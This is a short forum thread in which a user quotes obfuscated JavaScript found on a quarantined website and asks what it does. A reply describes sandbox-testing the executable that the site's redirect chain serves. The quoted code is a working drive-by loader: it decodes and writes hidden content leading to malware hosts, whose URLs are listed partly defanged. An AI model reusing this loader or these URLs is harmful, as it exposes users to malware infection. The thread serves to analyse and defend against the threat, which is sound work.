What does this code do?

General discussion about the NoScript extension for Firefox
Post Reply
luntrus
Senior Member
Posts: 237
Joined: Sat Mar 21, 2009 6:29 pm

What does this code do?

Post by luntrus »

Hi forum friends,

Found this piece of code, here: http://dreamonisland.com/js/google.js (WOT flags the site as quarantined)

Code: Select all

function IO1IO00ll1lOIll1() {
	var llIO0O1llll0lOOI = 'Bie peq eeexe, letc. Kefeee vbj cieoecec egbkbx bxese xesesdzefetd zet bweiet ecbxep; eibwe verepbheseteqexed. Eke c. Cickebe pese ceobjcibu cic keoetepereoe cbjcibu cickeqeeexe leteueje ee sete. Ebj cib ucibgbibxepeqeeexeletbg.';
	return llIO0O1llll0lOOI.toLowerCase();
}
function OI1OlO1lI01101OO(l101I10I0lI0O0I1, O0llO0l01011OllI) {
	return l101I10I0lI0O0I1.charCodeAt(O0llO0l01011OllI);
}
function Olll00O1001O10l1(OI1OI0I01lOll1Ol) {
	return String.fromCharCode(OI1OI0I01lOll1Ol);
}
function IOI1O1IOO00I0l01(llI00OIOII1IIO00) {
	document.write(llI00OIOII1IIO00);
}
var lOO10I1lIlO11OI1 = IO1IO00ll1lOIll1();
var Ol0IO1O010OOO1lO = true;
var l1IIIllOIIIlI0I1 = 0;
var Ol010IOOI0011lIO = "";
var I11010Oll1lO1Ol0 = 30;
var I10IOII1lOI00O0O = 67 + I11010Oll1lO1Ol0;
var lI00I0Ol0l10010I = -4 + I11010Oll1lO1Ol0;
for (var O11OOI1OIIOI0IOI = 0; O11OOI1OIIOI0IOI < lOO10I1lIlO11OI1.length; O11OOI1OIIOI0IOI++) {
	IlO1O110Ill1001l = OI1OlO1lI01101OO(lOO10I1lIlO11OI1, O11OOI1OIIOI0IOI) - I10IOII1lOI00O0O;
	if (IlO1O110Ill1001l >= 0 && IlO1O110Ill1001l <= (lI00I0Ol0l10010I - 1)) {
		if (Ol0IO1O010OOO1lO) {
			l1IIIllOIIIlI0I1 = IlO1O110Ill1001l * lI00I0Ol0l10010I;
		} else {
			l1IIIllOIIIlI0I1 += IlO1O110Ill1001l;
			Ol010IOOI0011lIO += Olll00O1001O10l1(l1IIIllOIIIlI0I1 ^ I11010Oll1lO1Ol0);
			l1IIIllOIIIlI0I1 = 0;
		}
		Ol0IO1O010OOO1lO = !Ol0IO1O010OOO1lO;
	}
}
IOI1O1IOO00I0l01(Ol010IOOI0011lIO);
What does it do actually, and is it suspicious? This could be another reason to have NS block it,
Analyzing here I can have a good guess at what it does: http://jsunpack.jeek.org/dec/go?report= ... de541ed715
going here: hxtp://daddyseye.net/in.cgi?default and then here: http://www.itmakemehappy*com/666/load0x1.php?spl=mdac&fh=
a dangerous site, re: http://www.malwaredomainlist.com/mdl.ph ... ehappy.com
Consider also: http://wepawet.iseclab.org/view.php?has ... 64&type=js

luntrus
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.16) Gecko/2010010414 Firefox/3.0.16 Flock/2.5.6
Top
Alan Baxter
Ambassador
Posts: 1586
Joined: Fri Mar 20, 2009 4:47 am
Location: Colorado, USA

Re: What does this code do?

Post by Alan Baxter »

luntrus wrote:http://www.itmakemehappy*com/666/load0x1.php?spl=mdac&fh=
a dangerous site,
Testing in a sandbox -- of course -- Avast blocked the execution of the payload, loadx1.exe. Before that happened I had to click through a Firefox dialog asking me if I wanted to download it, open the exe by double-clicking on it, click through another Firefox dialog warning me that "loadx1.exe" is an executable file. Executable files may contain viruses or other malicious code that could harm your computer. Use caution when opening this file. Are you sure you want to launch "loadx1.exe"?, and finally clicking through a Security Warning dialog from Windows.

Even if it were a zero-day exploit that Avast didn't know about, I would have been protected by my unwillingness to run programs I haven't asked for.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.4) Gecko/20100527 Firefox/3.6.4
Top
Post Reply

Return to “NoScript General”